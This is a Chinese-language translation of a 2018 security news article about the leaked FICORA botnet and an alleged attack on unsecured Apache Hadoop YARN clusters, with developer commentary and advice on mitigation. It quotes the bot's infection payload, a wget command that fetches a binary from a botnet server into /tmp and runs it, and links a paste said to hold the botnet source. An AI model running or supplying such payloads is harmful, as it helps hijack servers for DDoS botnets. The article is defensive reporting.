幽灵战队的0x20k发布了用于攻击Apache Hadoop的0day漏洞,该漏洞被指用于搭建FICORA僵尸网络。
对于早些时候关于利用Hadoop集群建立DemonBot的新闻,幽灵战队的黑客0x20k发布了用于构建最新版FICORA僵尸网络的完整源代码来作出回应,网址是https://ghostbin.com/paste/f87rf
0x20k也被认为是Yasaku Botnet的作者,他也是下面所提及的0day漏洞的作者。
与被认为感染了70台服务器的DemonBot僵尸网络不同,20k声称已经感染了1000多台服务器。通过Voxility的验证,这些服务器出口流量达到350 Gbps以上。
根据20k的说法,现在臭名昭著的僵尸网络DemonBot的作者从Owari的作者的服务器上窃取了它,然后在2018年9月将其放到网上售卖。这样DemonBot发明人的“荣誉”就落在了错误的人身上,这就是为什么20k决定在任何人试图从他手中偷走它之前,在外网开放它,以验证所有权。20k还发布了几段视频,展示了他在不同的服务器和服务上测试各种攻击,包括OVH、NFO、ProxyPipe和Mineplex——据称他们的攻击流量在110gbps到200gbps之间。
就这两个僵尸网络的操作方式而言,它们是非常不同的。例如,根据设备/服务器上Python或Perl和telnetd的可利用性,DemonBot通过端口6982在22或23上感染和传播。
而FICORA则通过8088端口感染。在Demonbot中,DDoS攻击向量支持UDP和TCP洪水,而FICORA在TCP32端口中使用URG洪水。此外,DemonBot只是Lizkebab的一个重命名版本,而FICORA则类似于Mirai,但是它和Mirai功能不同。
所涉及的源码
Rogue安全实验室已经联系了几家受到影响的服务机构,以确认攻击的有效性。尽管OVH拒绝就此事置评,但NFO总裁兼首席执行官证实,针对他们服务器的每3次访问就有一次攻击。另一方面,ProxyPipe对我的邮件采取强硬的回话,声称他们的服务器从来没有崩溃过,公司也从来没有见过接近200 Gbps流量的服务器。
在回应NFO面临的DoS攻击时,John说:“110 Gbps这个数字很可能来自我们的网站https://www.nfoservers.com/networklocations.php。”
他补充说:“攻击者通常会引用该站点,因为一旦当他们能够触发空路由时,就会产生大量的流量,尽管这并不是它的实际作用。”他没有证实或否认FICORA僵尸网络是否能吸引这类流量,他只是说,YouTube视频上展示的IP并不一定能让僵尸网络所有者准确地了解到产生的流量。尽管他说那些IP肯定在特定的日期都崩溃了。
如何利用:
经过分析,专门研究Apache Hadoop的软件开发人员Steve Loughran告诉Rogue Security,“如果这发生在支持Kerberos的YARN集群上,那么YARN REST API中的一个弱点就是spnego认证的调用者身份验证失败。这是我们可以看到和处理的东西。或者是管理工具使用默认密码来获得权限。解释说,“就好像集群在没有密码检查的情况下启用了telnet或rlogin一样。”
然而,正如20k解释的那样,FICORA包含telnet、ssh和hadoop服务器。对于telnet服务,他使用了字典的爆破,就像ssh一样,hadoop占据了最多的数量。20k补充说,是一个远程代码执行bug让他能够在Hadoop的目录/tmp中执行x86二进制文件。
有效payload基本上是 cd /tmp
wget http://botet.server/x86
chmod 777 x86
./x86 hadoop.x86
也许最重要的是,正如20k在发布这个漏洞时所解释的那样:“我们已经隐藏好了这个漏洞,希望你能抓住它们。”对于Hadoop开发者来说,这尤其令人担忧。Loughran表示,Apache能做的就是“为集群提供启动Kerberos的建议”。对于这个特定的集群,关闭YARN API可能会破坏一些东西,但是如果恶意软件依赖于它的存在(以及已知的HTTP端口),那么在YARN-site.xm l中将这个属性的设为false。
图像可能包含:文本
“这可能会暂时减缓它的速度——尽管可能会破坏依赖它的应用程序——但如果恶意软件能够发出Hadoop RPC调用来执行YARN,它仍然可以提交工作,或者,由于HDFS文件系统同样不受保护,通过FS进入。”
根据这个脚本,Loughran注意到这个漏洞不是一个远程代码执行错误,而是一个远程作业提交。到今天为止,10/31/2018,Apache正在积极地尝试计算是否有一些Hadoop REST api的实际利用,即使是在启用安全选项的情况下,或者这是否是一个不安全的Hadoop集群正在运行其他人的代码的问题。由于没有已知的漏洞补丁存在,Loughran甚至承认,考虑到漏洞利用ssh端口来进行字典攻击,需要修复服务器的数量可能超出了预估的范围。
尽管如此,Hadoop的开发者声称上面列出的漏洞“不是0day漏洞”。他们表示,更有可能的是这是一种“对网络上可见的不安全Hadoop集群上有计划的攻击”。然而,即便如此,Loughran也无法弄清楚代码到底是如何工作或者破坏设备的,他说,“可能是启用了Kerberos的系统存在真正的漏洞。”如果真的是这样的话,那就是0day。
那么,现在的解决办法是什么?不要让你的系统在互联网上暴露。实际上,如果可能的话,在一个私网中保持对访问权限的控制。
原文链接:https://securityaffairs.co/wordpress/77565/malware/hadoop-zero-day-exploit-leaked.html